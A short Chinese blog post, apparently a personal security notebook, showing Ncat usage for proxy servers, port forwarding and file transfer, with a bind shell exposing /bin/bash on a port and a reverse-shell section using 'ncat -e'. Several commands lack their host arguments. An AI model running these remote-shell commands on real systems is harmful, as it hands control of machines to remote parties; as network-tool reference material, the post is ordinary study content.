使用 Ncat 快速创建代理服务器

wpadmin~September 6, 2018 /InfoSec

使用 Ncat 快速创建代理服务器 proxy | reverse shell



Ncat Proxy Options – Ncat Documentation

The currently available protocols in connect mode are http (CONNECT), socks4 (SOCKSv4), and socks5 (SOCKSv5). The only server currently supported is http. If this option is not used, the default protocol is http.

注意,虽然参数中存在 socks4socks5, 但实际上 Ncat 作为服务端现在仅支持 HTTP

ncat --proxy-type http -lvp 7878 --ssl
ncat --proxy-type http -lvp 7878
ncat -l 3128 --proxy-type http
# 其他示例
ncat -l 3128 --proxy-type http
ncat -l 3128 --proxy-type http --proxy-auth <user>:<pass>

# Connect to on TCP port 8080.
ncat 8080

# Listen for connections on TCP port 8080.
ncat -l 8080

# Redirect TCP port 8080 on the local machine to host on port 80.
ncat --sh-exec "ncat 80" -l 8080 --keep-open

# Bind to TCP port 8081 and attach /bin/bash for the world to access freely.
ncat --exec "/bin/bash" -l 8081 --keep-open

# Bind a shell to TCP port 8081, limit access to hosts on a local
# network, and limit the maximum number of simultaneous connections to 3.
ncat --exec "/bin/bash" --max-conns 3 --allow -l 8081 --keep-open

# Connect to smtphost:25 through a SOCKS4 server on port 1080.
ncat --proxy socks4host --proxy-type socks4 --proxy-auth joe smtphost 25

# Connect to smtphost:25 through a SOCKS5 server on port 1080.
ncat --proxy socks5host --proxy-type socks5 --proxy-auth joe:secret smtphost 25

# Create an HTTP proxy server on localhost port 8888.
ncat -l --proxy-type http localhost 8888

# 文件传输
# Send a file over TCP port 9899 from host2 (client) to host1 (server).
HOST1$ ncat -l 9899 > outputfile
HOST2$ ncat HOST1 9899 < inputfile

# Transfer in the other direction, turning Ncat into a “one file” server.
HOST1$ ncat -l 9899 < inputfile
HOST2$ ncat HOST1 9899 > outputfile

反弹 Shell

Reverse shell

# Server
ncat -lvvp 1212
# Client
ncat -e cmd 1212
# -e 参数制定要转发的二进制程序, Linux 下可以是 /bin/bash



@倾旋 我的安全成长口袋

Chapter 17. Ncat Reference Guide


Proxy Options

Ncat Reference Guide

Leave a Reply

Your email address will not be published. Required fields are marked *